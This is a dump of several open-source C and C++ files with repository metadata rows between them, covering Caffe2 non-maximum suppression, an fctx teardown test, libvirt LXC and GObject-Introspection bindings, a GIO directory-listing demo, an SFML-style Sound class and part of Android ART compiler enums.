const Eigen::ArrayBase<Derived2>& scores,
const std::vector<int>& sorted_indices,
float thresh,
int topN = -1,
bool legacy_plus_one = false) {
CAFFE_ENFORCE(proposals.cols() == 4 || proposals.cols() == 5);
if (proposals.cols() == 4) {
// Upright boxes
return nms_cpu_upright(
proposals, scores, sorted_indices, thresh, topN, legacy_plus_one);
} else {
// Rotated boxes with angle info
return nms_cpu_rotated(proposals, scores, sorted_indices, thresh, topN);
}
}
// Greedy non-maximum suppression for proposed bounding boxes
// Reject a bounding box if its region has an intersection-overunion (IoU)
// overlap with a higher scoring selected bounding box larger than a
// threshold.
// Reference: facebookresearch/Detectron/detectron/lib/utils/cython_nms.pyx
// proposals: pixel coordinates of proposed bounding boxes,
// size: (M, 4), format: [x1; y1; x2; y2]
// size: (M, 5), format: [ctr_x; ctr_y; w; h; angle (degrees)] for RRPN
// scores: scores for each bounding box, size: (M, 1)
// return: row indices of the selected proposals
template <class Derived1, class Derived2>
std::vector<int> nms_cpu(
const Eigen::ArrayBase<Derived1>& proposals,
const Eigen::ArrayBase<Derived2>& scores,
float thres,
bool legacy_plus_one = false) {
std::vector<int> indices(proposals.rows());
std::iota(indices.begin(), indices.end(), 0);
std::sort(
indices.data(),
indices.data() + indices.size(),
[&scores](int lhs, int rhs) { return scores(lhs) > scores(rhs); });
return nms_cpu(
proposals,
scores,
indices,
thres,
-1 /* topN */,
legacy_plus_one /* legacy_plus_one */);
}
template <class Derived1, class Derived2, class Derived3>
std::vector<int> soft_nms_cpu(
Eigen::ArrayBase<Derived3>* out_scores,
const Eigen::ArrayBase<Derived1>& proposals,
const Eigen::ArrayBase<Derived2>& scores,
const std::vector<int>& indices,
float sigma = 0.5,
float overlap_thresh = 0.3,
float score_thresh = 0.001,
unsigned int method = 1,
int topN = -1,
bool legacy_plus_one = false) {
CAFFE_ENFORCE(proposals.cols() == 4 || proposals.cols() == 5);
if (proposals.cols() == 4) {
// Upright boxes
return soft_nms_cpu_upright(
out_scores,
proposals,
scores,
indices,
sigma,
overlap_thresh,
score_thresh,
method,
topN,
legacy_plus_one);
} else {
// Rotated boxes with angle info
return soft_nms_cpu_rotated(
out_scores,
proposals,
scores,
indices,
sigma,
overlap_thresh,
score_thresh,
method,
topN);
}
}
template <class Derived1, class Derived2, class Derived3>
std::vector<int> soft_nms_cpu(
Eigen::ArrayBase<Derived3>* out_scores,
const Eigen::ArrayBase<Derived1>& proposals,
const Eigen::ArrayBase<Derived2>& scores,
float sigma = 0.5,
float overlap_thresh = 0.3,
float score_thresh = 0.001,
unsigned int method = 1,
int topN = -1,
bool legacy_plus_one = false) {
std::vector<int> indices(proposals.rows());
std::iota(indices.begin(), indices.end(), 0);
return soft_nms_cpu(
out_scores,
proposals,
scores,
indices,
sigma,
overlap_thresh,
score_thresh,
method,
topN,
legacy_plus_one);
}
} // namespace utils
} // namespace caffe2
#endif // CAFFE2_OPERATORS_UTILS_NMS_H_
| 32.760951 | 80 | 0.641924 |
7fcf44c0c27ae172fa721c9f10ddd984056177f7 | 1,244 | c | C | tests/test_call_teardown.c | elfenix/fctx | e5f315cf6b7a50cff99488ac00bee09849e9eee8 | [
"BSD-3-Clause"
] | 23 | 2015-01-14T23:12:58.000Z | 2021-12-26T21:50:37.000Z | tests/test_call_teardown.c | elfenix/fctx | e5f315cf6b7a50cff99488ac00bee09849e9eee8 | [
"BSD-3-Clause"
] | 1 | 2020-11-14T20:52:21.000Z | 2020-11-14T20:52:21.000Z | tests/test_call_teardown.c | elfenix/fctx | e5f315cf6b7a50cff99488ac00bee09849e9eee8 | [
"BSD-3-Clause"
] | 8 | 2015-04-02T01:58:08.000Z | 2021-06-02T05:13:59.000Z | /*
====================================================================
Copyright (c) 2009 Ian Blumel. All rights reserved.
This software is licensed as described in the file LICENSE, which
you should have received as part of this distribution.
====================================================================
File: test_call_teardown.c
Checks that the teardown function is executed (bug #382628).
*/
#include "fct.h"
FCT_BGN()
{
/* This value is incremented during the setup, then incremented in the
first test, it is finally decremented in the last test. Thus in the next
test suite I can test for a value of 1. */
int reference =0;
FCT_FIXTURE_SUITE_BGN("1Suite")
{
FCT_SETUP_BGN()
{
reference++;
}
FCT_SETUP_END();
FCT_TEARDOWN_BGN()
{
reference--;
}
FCT_TEARDOWN_END();
FCT_TEST_BGN(__dummy__)
{
reference++;
}
FCT_TEST_END();
}
FCT_FIXTURE_SUITE_END();
FCT_SUITE_BGN(check_teardown)
{
FCT_TEST_BGN(check_reference_count)
{
fct_chk( reference == 1 );
}
FCT_TEST_END();
}
FCT_SUITE_END();
}
FCT_END();
| 22.214286 | 76 | 0.528939 |
d26212812df253609258fb222823439366f729b9 | 618 | h | C | Source/Windows/DanceStudio/DanceStudio.Core.UnitTests/stdafx.h | DirtyPiece/dancestudio | 86b3d7d379996840acb12da6ebbd80b48e564dc4 | [
"MIT"
] | 1 | 2015-03-10T05:17:33.000Z | 2015-03-10T05:17:33.000Z | Source/Windows/DanceStudio/DanceStudio.Core.UnitTests/stdafx.h | DirtyPiece/dancestudio | 86b3d7d379996840acb12da6ebbd80b48e564dc4 | [
"MIT"
] | 3 | 2015-02-15T20:15:40.000Z | 2015-02-16T06:19:52.000Z | Source/Windows/DanceStudio/DanceStudio.Core.UnitTests/stdafx.h | DirtyPiece/dancestudio | 86b3d7d379996840acb12da6ebbd80b48e564dc4 | [
"MIT"
] | null | null | null | // =======================================================================
// <copyright file="stdafx.h" company="Bean and Cheese Studios">
// Copyright 2015 Bean and Cheese Studios
// </copyright>
// <date>12-27-2014</date>
// =======================================================================
#ifndef SOURCE_WINDOWS_DANCESTUDIO_DANCESTUDIO_CORE_UNITTESTS_STDAFX_H_
#define SOURCE_WINDOWS_DANCESTUDIO_DANCESTUDIO_CORE_UNITTESTS_STDAFX_H_
#include "Targetver.h"
// Headers for CppUnitTest
#include "CppUnitTest.h"
#include "Macros.h"
#endif // SOURCE_WINDOWS_DANCESTUDIO_DANCESTUDIO_CORE_UNITTESTS_STDAFX_H_
| 34.333333 | 74 | 0.618123 |
1901fce4f8d372d611316a7c4a8d6a67a655a3d9 | 1,867 | h | C | drivers/libvirt-dev/usr/include/libvirt/libvirt-lxc.h | node-computes/nc-virt | 0ba91e009206ae1c9a2238f1d54e848306ec80ff | [
"Apache-2.0"
] | 3 | 2017-09-22T15:10:01.000Z | 2018-03-30T02:11:54.000Z | drivers/libvirt-dev/usr/include/libvirt/libvirt-lxc.h | node-computes/nc-virt | 0ba91e009206ae1c9a2238f1d54e848306ec80ff | [
"Apache-2.0"
] | null | null | null | drivers/libvirt-dev/usr/include/libvirt/libvirt-lxc.h | node-computes/nc-virt | 0ba91e009206ae1c9a2238f1d54e848306ec80ff | [
"Apache-2.0"
] | null | null | null | /* -*- c -*-
* libvirt-lxc.h: Interfaces specific for LXC driver
* Summary: lxc specific interfaces
* Description: Provides the interfaces of the libvirt library to handle
* LXC specific methods
*
* Copyright (C) 2012-2013 Red Hat, Inc.
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library. If not, see
* <http://www.gnu.org/licenses/>.
*
* Author: Daniel P. Berrange <berrange@redhat.com>
*/
#ifndef __VIR_LXC_H__
# define __VIR_LXC_H__
# include <libvirt/libvirt.h>
# ifdef __cplusplus
extern "C" {
# endif
int virDomainLxcOpenNamespace(virDomainPtr domain,
int **fdlist,
unsigned int flags);
int virDomainLxcEnterNamespace(virDomainPtr domain,
unsigned int nfdlist,
int *fdlist,
unsigned int *noldfdlist,
int **oldfdlist,
unsigned int flags);
int virDomainLxcEnterSecurityLabel(virSecurityModelPtr model,
virSecurityLabelPtr label,
virSecurityLabelPtr oldlabel,
unsigned int flags);
# ifdef __cplusplus
}
# endif
#endif /* __VIR_LXC_H__ */
| 33.945455 | 72 | 0.622389 |
c5559824b88237f4f553fa38ebb7ef2bf516ef5f | 1,185 | h | C | include/scene_editor.h | TamplierS1/shooter | 01b42b087a8cf68434c9c89f070eaf10c86ffd53 | [
"MIT"
] | null | null | null | include/scene_editor.h | TamplierS1/shooter | 01b42b087a8cf68434c9c89f070eaf10c86ffd53 | [
"MIT"
] | null | null | null | include/scene_editor.h | TamplierS1/shooter | 01b42b087a8cf68434c9c89f070eaf10c86ffd53 | [
"MIT"
] | null | null | null | #pragma once
#include <memory>
#include <optional>
#include "TPOrbitCamera.h"
#include "scene.h"
class SceneEditor
{
public:
SceneEditor();
~SceneEditor();
int run();
private:
void handle_input();
void render_scene();
void render_gui();
void render_file_browser(bool is_visible);
void render_spawn_menu(bool is_visible);
void render_object_menu();
void render_transform_gizmo();
void update_object_transform(Object* object);
void serialize() const;
void load_scene(std::string_view path);
[[nodiscard]] std::shared_ptr<Object> create_default_object(
const std::string& model_name) const;
void zero_transform_axises();
[[nodiscard]] Vector3 calc_mouse_dist_traveled() const;
[[nodiscard]] std::optional<std::shared_ptr<Object>> get_closest_clicked_object()
const;
bool m_is_active = true;
const int m_win_width = 1920;
const int m_win_height = 1080;
TPOrbitCamera m_camera;
std::unique_ptr<Scene> m_scene;
std::shared_ptr<Object> m_selected_object;
Vector3 m_move_axis = {0, 0, 0};
Vector3 m_scale_axis = {0, 0, 0};
Vector2 m_prev_mouse_pos = {0, 0};
};
| 23.235294 | 85 | 0.690295 |
c55de97eb937e0d6cc6c1f01d86ece3624a8ec96 | 1,081 | h | C | include/CppUtil/RTX/GenData.h | Vinluo/RenderLab | c7f52154a7aea9afb37537b8a0eac1fcf9100182 | [
"MIT"
] | 1 | 2019-06-13T02:55:01.000Z | 2019-06-13T02:55:01.000Z | include/CppUtil/RTX/GenData.h | ishigami33/RenderLab | 86c9ab48815adcbdc6afb39883337088fb019bc0 | [
"MIT"
] | null | null | null | include/CppUtil/RTX/GenData.h | ishigami33/RenderLab | 86c9ab48815adcbdc6afb39883337088fb019bc0 | [
"MIT"
] | null | null | null | #ifndef _RTX_GEN_DATA_GEN_DATA_H_
#define _RTX_GEN_DATA_GEN_DATA_H_
#include <CppUtil/Basic/Ptr.h>
#include <map>
#include <vector>
namespace CppUtil {
namespace Basic {
class Image;
}
}
namespace RTX {
class Hitable;
class Group;
class GenData_HV;
class GenData_MV;
class GenData_TV;
class GenData {
public:
typedef std::map<CppUtil::Basic::CPtr<CppUtil::Basic::Image>, size_t> ImgIdxMap;
typedef std::vector<CppUtil::Basic::CPtr<CppUtil::Basic::Image> > SkyboxImgs;
GenData(CppUtil::Basic::CPtr<Hitable> scene);
const std::vector<float> GetSceneData() const;
const std::vector<float> GetMatData() const;
const std::vector<float> GetTexData() const;
const std::vector<float> GetPackData() const;
const ImgIdxMap GetImgIdxMap() const;
const SkyboxImgs & GetSkyboxImgs() const;
private:
CppUtil::Basic::Ptr<GenData_HV> hitableVisitor;
CppUtil::Basic::Ptr<GenData_MV> matVisitor;
CppUtil::Basic::Ptr<GenData_TV> texVisitor;
CppUtil::Basic::CPtr<Group> root;
std::vector<float> packData;
};
}
#endif // !_RTX_GEN_DATA_GEN_DATA_H_
| 22.520833 | 82 | 0.736355 |
305916a2531c0e003618e04596fa4c0cbade2790 | 8,356 | h | C | plugins/Nephilim/sfml sound includes/Sound.h | GrimshawA/Nephilim | 1e69df544078b55fdaf58a04db963e20094f27a9 | [
"Zlib"
] | 19 | 2015-12-19T11:15:57.000Z | 2022-03-09T11:22:11.000Z | plugins/Nephilim/sfml sound includes/Sound.h | DevilWithin/Nephilim | 1e69df544078b55fdaf58a04db963e20094f27a9 | [
"Zlib"
] | 1 | 2017-05-17T09:31:10.000Z | 2017-05-19T17:01:31.000Z | plugins/Nephilim/sfml sound includes/Sound.h | GrimshawA/Nephilim | 1e69df544078b55fdaf58a04db963e20094f27a9 | [
"Zlib"
] | 3 | 2015-12-14T17:40:26.000Z | 2021-02-25T00:42:42.000Z | ////////////////////////////////////////////////////////////////////////////////
//
// SFML - Simple and Fast Multimedia Library
// Copyright (C) 2007-2013 Laurent Gomila (laurent.gom@gmail.com)
//
// This software is provided 'as-is', without any express or implied warranty.
// In no event will the authors be held liable for any damages arising from the
// use of this software.
//
// Permission is granted to anyone to use this software for any purpose,
// including commercial applications, and to alter it and redistribute it
// freely, subject to the following restrictions:
//
// 1. The origin of this software must not be misrepresented;
// you must not claim that you wrote the original software.
// If you use this software in a product, an acknowledgment
// in the product documentation would be appreciated but is not required.
//
// 2. Altered source versions must be plainly marked as such,
// and must not be misrepresented as being the original software.
//
// 3. This notice may not be removed or altered from any source distribution.
//
////////////////////////////////////////////////////////////////////////////////
#ifndef NephilimSound_h__
#define NephilimSound_h__
#include <Nephilim/Platform.h>
#include "SoundSourceSF.h"
#include <Nephilim/Time.h>
#include <cstdlib>
NEPHILIM_NS_BEGIN
class SoundBuffer;
////////////////////////////////////////////////////////////////////////////////
/// \brief Regular sound that can be played in the audio environment
///
////////////////////////////////////////////////////////////////////////////////
class NEPHILIM_API Sound : public SoundSource
{
public :
////////////////////////////////////////////////////////////////////////////
/// \brief Default constructor
///
////////////////////////////////////////////////////////////////////////////
Sound();
////////////////////////////////////////////////////////////////////////////
/// \brief Construct the sound with a buffer
///
/// \param buffer Sound buffer containing the audio data to play with the sound
///
////////////////////////////////////////////////////////////////////////////
explicit Sound(const SoundBuffer& buffer);
////////////////////////////////////////////////////////////////////////////
/// \brief Copy constructor
///
/// \param copy Instance to copy
///
////////////////////////////////////////////////////////////////////////////
Sound(const Sound& copy);
////////////////////////////////////////////////////////////////////////////
/// \brief Destructor
///
////////////////////////////////////////////////////////////////////////////
~Sound();
////////////////////////////////////////////////////////////////////////////
/// \brief Start or resume playing the sound
///
/// This function starts the stream if it was stopped, resumes
/// it if it was paused, and restarts it from beginning if it
/// was it already playing.
/// This function uses its own thread so that it doesn't block
/// the rest of the program while the sound is played.
///
/// \see pause, stop
///
////////////////////////////////////////////////////////////////////////////
void play();
////////////////////////////////////////////////////////////////////////////
/// \brief Pause the sound
///
/// This function pauses the sound if it was playing,
/// otherwise (sound already paused or stopped) it has no effect.
///
/// \see play, stop
///
////////////////////////////////////////////////////////////////////////////
void pause();
////////////////////////////////////////////////////////////////////////////
/// \brief stop playing the sound
///
/// This function stops the sound if it was playing or paused,
/// and does nothing if it was already stopped.
/// It also resets the playing position (unlike pause()).
///
/// \see play, pause
///
////////////////////////////////////////////////////////////////////////////
void stop();
////////////////////////////////////////////////////////////////////////////
/// \brief Set the source buffer containing the audio data to play
///
/// It is important to note that the sound buffer is not copied,
/// thus the sf::SoundBuffer instance must remain alive as long
/// as it is attached to the sound.
///
/// \param buffer Sound buffer to attach to the sound
///
/// \see getBuffer
///
////////////////////////////////////////////////////////////////////////////
void setBuffer(const SoundBuffer& buffer);
////////////////////////////////////////////////////////////////////////////
/// \brief Set whether or not the sound should loop after reaching the end
///
/// If set, the sound will restart from beginning after
/// reaching the end and so on, until it is stopped or
/// setLoop(false) is called.
/// The default looping state for sound is false.
///
/// \param loop True to play in loop, false to play once
///
/// \see getLoop
///
////////////////////////////////////////////////////////////////////////////
void setLoop(bool loop);
////////////////////////////////////////////////////////////////////////////
/// \brief Change the current playing position of the sound
///
/// The playing position can be changed when the sound is
/// either paused or playing.
///
/// \param timeOffset New playing position, from the beginning of the sound
///
/// \see getPlayingOffset
///
////////////////////////////////////////////////////////////////////////////
void setPlayingOffset(Time timeOffset);
////////////////////////////////////////////////////////////////////////////
/// \brief Get the audio buffer attached to the sound
///
/// \return Sound buffer attached to the sound (can be NULL)
///
////////////////////////////////////////////////////////////////////////////
const SoundBuffer* getBuffer() const;
////////////////////////////////////////////////////////////////////////////
/// \brief Tell whether or not the sound is in loop mode
///
/// \return True if the sound is looping, false otherwise
///
/// \see setLoop
///
////////////////////////////////////////////////////////////////////////////
bool getLoop() const;
////////////////////////////////////////////////////////////////////////////
/// \brief Get the current playing position of the sound
///
/// \return Current playing position, from the beginning of the sound
///
/// \see setPlayingOffset
///
////////////////////////////////////////////////////////////////////////////
Time getPlayingOffset() const;
////////////////////////////////////////////////////////////////////////////
/// \brief Get the current status of the sound (stopped, paused, playing)
///
/// \return Current status of the sound
///
////////////////////////////////////////////////////////////////////////////
Status getStatus() const;
////////////////////////////////////////////////////////////////////////////
/// \brief Overload of assignment operator
///
/// \param right Instance to assign
///
/// \return Reference to self
///
////////////////////////////////////////////////////////////////////////////
Sound& operator =(const Sound& right);
////////////////////////////////////////////////////////////////////////////
/// \brief Reset the internal buffer of the sound
///
/// This function is for internal use only, you don't have
/// to use it. It is called by the sf::SoundBuffer that
/// this sound uses, when it is destroyed in order to prevent
/// the sound from using a dead buffer.
///
////////////////////////////////////////////////////////////////////////////
void resetBuffer();
private :
////////////////////////////////////////////////////////////////////////////
// Member data
////////////////////////////////////////////////////////////////////////////
const SoundBuffer* m_buffer; ///< Sound buffer bound to the source
};
NEPHILIM_NS_END
#endif // NephilimSound_h__
| 37.809955 | 83 | 0.408329 |
5cc9985025d49a1cddf13f05627d08784cd8fbcb | 2,205 | c | C | demo/gio/gio-file-enumerate.c | dingjingmaster/clib | 97f0be4141cf5bdab0d63e7952c65fc71f13f426 | [
"MIT"
] | 4 | 2020-10-30T12:40:10.000Z | 2021-09-02T03:07:22.000Z | demo/gio/gio-file-enumerate.c | dingjingmaster/clib | 97f0be4141cf5bdab0d63e7952c65fc71f13f426 | [
"MIT"
] | null | null | null | demo/gio/gio-file-enumerate.c | dingjingmaster/clib | 97f0be4141cf5bdab0d63e7952c65fc71f13f426 | [
"MIT"
] | 3 | 2020-08-08T12:01:46.000Z | 2021-08-09T12:38:29.000Z | /*************************************************************************
> FileName: gio-file-enumerate.c
> Author : DingJing
> Mail : dingjing@live.cn
> Created Time: 2019年12月16日 星期一 09时49分02秒
************************************************************************/
#include <stdio.h>
#include <gio/gio.h>
int main (int argc, char* argv[])
{
GFile* fp = NULL;
GFile* foc = NULL;
GFileInfo* fi = NULL;
GFileEnumerator* fs = NULL;
GError* error = NULL;
gint files = 0;
char** fileattr = NULL;
fp = g_file_new_for_path ("/");
fs = g_file_enumerate_children (fp, "*", G_FILE_QUERY_INFO_NOFOLLOW_SYMLINKS, NULL, &error);
if (NULL == fs) {
if (NULL != error) printf ("error:%s", error->message);
g_error_free (error);
g_object_unref (error);
goto end;
}
do {
// 返回值表示 "错误" 或 "正在迭代"
g_file_enumerator_iterate (fs, &fi, &foc, NULL, error);
if (NULL != error) {
printf ("error:%s\n", error->message);
g_error_free(error);
g_object_unref (error);
continue;
}
if (NULL == fi || NULL == foc) {
printf ("结束迭代!文件总数:%d\n", files);
g_file_enumerator_close (fs, NULL, NULL);
break;
}
files += 1;
printf ("============================= 开始 ===============================\n");
printf ("path:%s\n", g_file_get_path(foc));
printf ("uri:%s\n", g_file_get_uri(foc));
printf ("name:%s\n", g_file_get_parse_name(foc));
printf ("file type:%s\n", g_file_get_parse_name(foc));
fileattr = g_file_info_list_attributes (fi, NULL);
if (NULL != fileattr) {
for (int i = 0; fileattr[i] != NULL; ++i) {
printf ("%s ------ %s\n", fileattr[i], g_file_info_get_attribute_as_string(fi, fileattr[i]));
}
}
printf ("============================= 结束 ===============================\n");
} while (1);
end:
if (NULL != fi) g_object_unref (fi);
if (NULL != foc) g_object_unref (foc);
if (NULL != fp) g_object_unref (fp);
if (NULL != fs) g_object_unref (fs);
return 0;
}
| 32.426471 | 109 | 0.472562 |
b77836f21d4f1c0a1aa72af4f327e1665aa7ea79 | 3,509 | c | C | gobject-introspection/ext/gobject-introspection/rb-gi-arg-info.c | cosmo0920/ruby-gnome2 | 88d17c64237c35d7cb38bf77fc290828b9269778 | [
"Ruby"
] | null | null | null | gobject-introspection/ext/gobject-introspection/rb-gi-arg-info.c | cosmo0920/ruby-gnome2 | 88d17c64237c35d7cb38bf77fc290828b9269778 | [
"Ruby"
] | null | null | null | gobject-introspection/ext/gobject-introspection/rb-gi-arg-info.c | cosmo0920/ruby-gnome2 | 88d17c64237c35d7cb38bf77fc290828b9269778 | [
"Ruby"
] | null | null | null | /* -*- c-file-style: "ruby"; indent-tabs-mode: nil -*- */
/*
* Copyright (C) 2012 Ruby-GNOME2 Project Team
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
* MA 02110-1301 USA
*/
#include "rb-gi-private.h"
#define RG_TARGET_NAMESPACE rb_cGIArgInfo
#define SELF(self) (RVAL2GI_ARG_INFO(self))
GType
gi_arg_info_get_type(void)
{
static GType type = 0;
if (type == 0) {
type = g_boxed_type_register_static("GIArgInfo",
(GBoxedCopyFunc)g_base_info_ref,
(GBoxedFreeFunc)g_base_info_unref);
}
return type;
}
static VALUE
rg_direction(VALUE self)
{
GIArgInfo *info;
info = SELF(self);
return GI_DIRECTION2RVAL(g_arg_info_get_direction(info));
}
static VALUE
rg_caller_allocates_p(VALUE self)
{
GIArgInfo *info;
info = SELF(self);
return CBOOL2RVAL(g_arg_info_is_caller_allocates(info));
}
static VALUE
rg_return_value_p(VALUE self)
{
GIArgInfo *info;
info = SELF(self);
return CBOOL2RVAL(g_arg_info_is_return_value(info));
}
static VALUE
rg_optional_p(VALUE self)
{
GIArgInfo *info;
info = SELF(self);
return CBOOL2RVAL(g_arg_info_is_optional(info));
}
static VALUE
rg_may_be_null_p(VALUE self)
{
GIArgInfo *info;
info = SELF(self);
return CBOOL2RVAL(g_arg_info_may_be_null(info));
}
static VALUE
rg_ownership_transfer(VALUE self)
{
GIArgInfo *info;
info = SELF(self);
return GI_TRANSFER2RVAL(g_arg_info_get_ownership_transfer(info));
}
static VALUE
rg_scope(VALUE self)
{
GIArgInfo *info;
info = SELF(self);
return GI_SCOPE_TYPE2RVAL(g_arg_info_get_scope(info));
}
static VALUE
rg_closure(VALUE self)
{
GIArgInfo *info;
info = SELF(self);
return INT2NUM(g_arg_info_get_closure(info));
}
static VALUE
rg_destroy(VALUE self)
{
GIArgInfo *info;
info = SELF(self);
return INT2NUM(g_arg_info_get_destroy(info));
}
static VALUE
rg_type(VALUE self)
{
GIArgInfo *info;
info = SELF(self);
return GI_BASE_INFO2RVAL_WITH_UNREF(g_arg_info_get_type(info));
}
void
rb_gi_arg_info_init(VALUE rb_mGI, VALUE rb_cGIBaseInfo)
{
VALUE RG_TARGET_NAMESPACE;
RG_TARGET_NAMESPACE =
G_DEF_CLASS_WITH_PARENT(GI_TYPE_ARG_INFO, "ArgInfo", rb_mGI,
rb_cGIBaseInfo);
RG_DEF_METHOD(direction, 0);
RG_DEF_METHOD_P(caller_allocates, 0);
RG_DEF_METHOD_P(return_value, 0);
RG_DEF_METHOD_P(optional, 0);
RG_DEF_METHOD_P(may_be_null, 0);
RG_DEF_METHOD(ownership_transfer, 0);
RG_DEF_METHOD(scope, 0);
RG_DEF_METHOD(closure, 0);
RG_DEF_METHOD(destroy, 0);
RG_DEF_METHOD(type, 0);
G_DEF_CLASS(G_TYPE_I_DIRECTION, "Direction", rb_mGI);
G_DEF_CLASS(G_TYPE_I_SCOPE_TYPE, "ScopeType", rb_mGI);
G_DEF_CLASS(G_TYPE_I_TRANSFER, "Transfer", rb_mGI);
}
| 23.085526 | 79 | 0.706184 |
b78b3d7d7551607cae3556ebb8faa36fb8719b0f | 19,917 | h | C | art/compiler/dex/compiler_enums.h | lihuibng/marshmallow | 950cf8de3b4d63af9fc9699374e4ec45ad09b3a7 | [
"Apache-2.0"
] | 8 | 2016-08-11T09:46:36.000Z | 2018-03-02T17:28:35.000Z | art-extension/compiler/dex/compiler_enums.h | android-art-intel/marshmallow | 87e8c22f248164780b92aaa0cdea14bf6cda3859 | [
"Apache-2.0"
] | 1 | 2022-03-08T08:20:47.000Z | 2022-03-08T08:20:47.000Z | art-extension/compiler/dex/compiler_enums.h | android-art-intel/marshmallow | 87e8c22f248164780b92aaa0cdea14bf6cda3859 | [
"Apache-2.0"
] | null | null | null | /*
* Copyright (C) 2012 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#ifndef ART_COMPILER_DEX_COMPILER_ENUMS_H_
#define ART_COMPILER_DEX_COMPILER_ENUMS_H_
#include "dex_instruction.h"
namespace art {
enum RegisterClass {
kInvalidRegClass,
kCoreReg,
kFPReg,
kRefReg,
kAnyReg,
};
std::ostream& operator<<(std::ostream& os, const RegisterClass& rhs);
enum BitsUsed {
kSize32Bits,
kSize64Bits,
kSize128Bits,
kSize256Bits,
kSize512Bits,
kSize1024Bits,
};
std::ostream& operator<<(std::ostream& os, const BitsUsed& rhs);
enum SpecialTargetRegister {
kSelf, // Thread pointer.
kSuspend, // Used to reduce suspend checks for some targets.
kLr,
kPc,
kSp,
kArg0,
kArg1,
kArg2,
kArg3,
kArg4,
kArg5,
kArg6,
kArg7,
kFArg0,
kFArg1,
kFArg2,
kFArg3,
kFArg4,
kFArg5,
kFArg6,
kFArg7,
kFArg8,
kFArg9,
kFArg10,
kFArg11,
kFArg12,
kFArg13,
kFArg14,
kFArg15,
kRet0,
kRet1,
kInvokeTgt,
kHiddenArg,
kHiddenFpArg,
kCount
};
std::ostream& operator<<(std::ostream& os, const SpecialTargetRegister& code);
enum RegLocationType {
kLocDalvikFrame = 0, // Normal Dalvik register
kLocPhysReg,
kLocCompilerTemp,
kLocInvalid
};
std::ostream& operator<<(std::ostream& os, const RegLocationType& rhs);
enum BBType {
kNullBlock,
kEntryBlock,
kDalvikByteCode,
kExitBlock,
kExceptionHandling,
kDead,
};
std::ostream& operator<<(std::ostream& os, const BBType& code);
// Shared pseudo opcodes - must be < 0.
enum LIRPseudoOpcode {
kPseudoPrologueBegin = -18,
kPseudoPrologueEnd = -17,
kPseudoEpilogueBegin = -16,
kPseudoEpilogueEnd = -15,
kPseudoExportedPC = -14,
kPseudoSafepointPC = -13,
kPseudoIntrinsicRetry = -12,
kPseudoSuspendTarget = -11,
kPseudoThrowTarget = -10,
kPseudoCaseLabel = -9,
kPseudoBarrier = -8,
kPseudoEntryBlock = -7,
kPseudoExitBlock = -6,
kPseudoTargetLabel = -5,
kPseudoDalvikByteCodeBoundary = -4,
kPseudoPseudoAlign4 = -3,
kPseudoEHBlockLabel = -2,
kPseudoNormalBlockLabel = -1,
};
std::ostream& operator<<(std::ostream& os, const LIRPseudoOpcode& rhs);
enum ExtendedMIROpcode {
kMirOpFirst = kNumPackedOpcodes,
kMirOpPhi = kMirOpFirst,
// @brief Copy from one VR to another.
// @details
// vA: destination VR
// vB: source VR
kMirOpCopy,
// @brief Used to do float comparison with less-than bias.
// @details Unlike cmpl-float, this does not store result of comparison in VR.
// vA: left-hand side VR for comparison.
// vB: right-hand side VR for comparison.
kMirOpFusedCmplFloat,
// @brief Used to do float comparison with greater-than bias.
// @details Unlike cmpg-float, this does not store result of comparison in VR.
// vA: left-hand side VR for comparison.
// vB: right-hand side VR for comparison.
kMirOpFusedCmpgFloat,
// @brief Used to do double comparison with less-than bias.
// @details Unlike cmpl-double, this does not store result of comparison in VR.
// vA: left-hand side wide VR for comparison.
// vB: right-hand side wide VR for comparison.
kMirOpFusedCmplDouble,
// @brief Used to do double comparison with greater-than bias.
// @details Unlike cmpl-double, this does not store result of comparison in VR.
// vA: left-hand side wide VR for comparison.
// vB: right-hand side wide VR for comparison.
kMirOpFusedCmpgDouble,
// @brief Used to do comparison of 64-bit long integers.
// @details Unlike cmp-long, this does not store result of comparison in VR.
// vA: left-hand side wide VR for comparison.
// vB: right-hand side wide VR for comparison.
kMirOpFusedCmpLong,
// @brief This represents no-op.
kMirOpNop,
// @brief Do a null check on the object register.
// @details The backends may implement this implicitly or explicitly. This MIR is guaranteed
// to have the correct offset as an exception thrower.
// vA: object register
kMirOpNullCheck,
kMirOpRangeCheck,
kMirOpDivZeroCheck,
kMirOpCheck,
kMirOpSelect,
// Vector opcodes:
// TypeSize is an encoded field giving the element type and the vector size.
// It is encoded as OpSize << 16 | (number of bits in vector)
//
// Destination and source are integers that will be interpreted by the
// backend that supports Vector operations. Backends are permitted to support only
// certain vector register sizes.
//
// At this point, only two operand instructions are supported. Three operand instructions
// could be supported by using a bit in TypeSize and arg[0] where needed.
// @brief MIR to move constant data to a vector register
// vA: destination
// vB: number of bits in register
// args[0]~args[3]: up to 128 bits of data for initialization
kMirOpConstVector,
// @brief MIR to move a vectorized register to another
// vA: destination
// vB: source
// vC: TypeSize
kMirOpMoveVector,
// @brief Packed multiply of units in two vector registers: vB = vB .* vC using vA to know the type of the vector.
// vA: destination and source
// vB: source
// vC: TypeSize
kMirOpPackedMultiply,
// @brief Packed addition of units in two vector registers: vB = vB .+ vC using vA to know the type of the vector.
// vA: destination and source
// vB: source
// vC: TypeSize
kMirOpPackedAddition,
// @brief Packed subtraction of units in two vector registers: vB = vB .- vC using vA to know the type of the vector.
// vA: destination and source
// vB: source
